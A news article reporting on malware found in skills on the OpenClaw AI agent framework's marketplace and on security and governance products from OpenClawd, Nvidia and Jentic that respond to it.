OpenClawd's Security Update: A Game Changer for AI
The OpenClaw open-source AI agent framework, which has amassed over 325,000 GitHub stars since its launch in late 2025, is facing a reckoning over supply-chain security even as major technology companies race to build enterprise infrastructure around it. On Thursday, managed hosting provider OpenClawd AI shipped a security-focused update after researchers found that 12% of skills on ClawHub, the framework's official marketplace, contained malware.
Malware in the Marketplace
The OpenClawd update adds automated skill vetting, verified installer sourcing, runtime sandboxing, and credential isolation to its managed platform. "There are now two ways to get compromised before you even run your first OpenClaw command," said Danny Wilson, an OpenClawd spokesperson. "You can install a fake version of the software, or you can install the real version and then add a skill that steals your data. We built this update so that neither path exists on our platform."
The threat is not theoretical. Security firm Repello AI traced 335 malicious skills to a single threat actor in a campaign researchers named "ClawHavoc," while Antiy CERT confirmed a total of 1,184 illicit skills across ClawHub. Researchers found keyloggers, credential stealers, and prompt injection payloads disguised as productivity tools. The most widely downloaded malicious skill was a cryptocurrency stealer. OpenClaw had previously partnered with VirusTotal in February to scan uploaded skills, but analysts noted that cleverly concealed payloads can still evade static analysis.
Nvidia Builds Enterprise Guardrails
The security concerns have not slowed corporate interest. At GTC 2026 on March 16, Nvidia CEO Jensen Huang announced NemoClaw, an enterprise wrapper for OpenClaw that adds sandboxing, policy enforcement, and network egress controls. Huang called OpenClaw "the operating system for personal AI" and declared that "every company in the world today needs to have an OpenClaw strategy." NemoClaw integrates OpenShell, a secure containerized runtime, directly into the OpenClaw stack, though Nvidia cautioned the platform remains in early alpha.
Governance Layer From Jentic
Separately, Dublin-based startup Jentic launched Jentic Mini on March 25, a free, self-hosted tool that provides a permissions and control layer around how AI agents access APIs and workflows. The platform connects agents to a curated catalog of more than 10,000 APIs and includes a single "killswitch" to instantly revoke an agent's data access. "The next era of software will not be built for humans. It will be built for agents, by agents," said Jentic CEO Sean Blanchfield. Jentic Mini works with OpenClaw, NemoClaw, and other general-purpose agent frameworks.
The flurry of activity underscores an emerging tension in the agentic AI space: the same autonomy that makes frameworks like OpenClaw powerful also makes them attractive targets for attackers — and the tools for governing that autonomy are only now catching up.
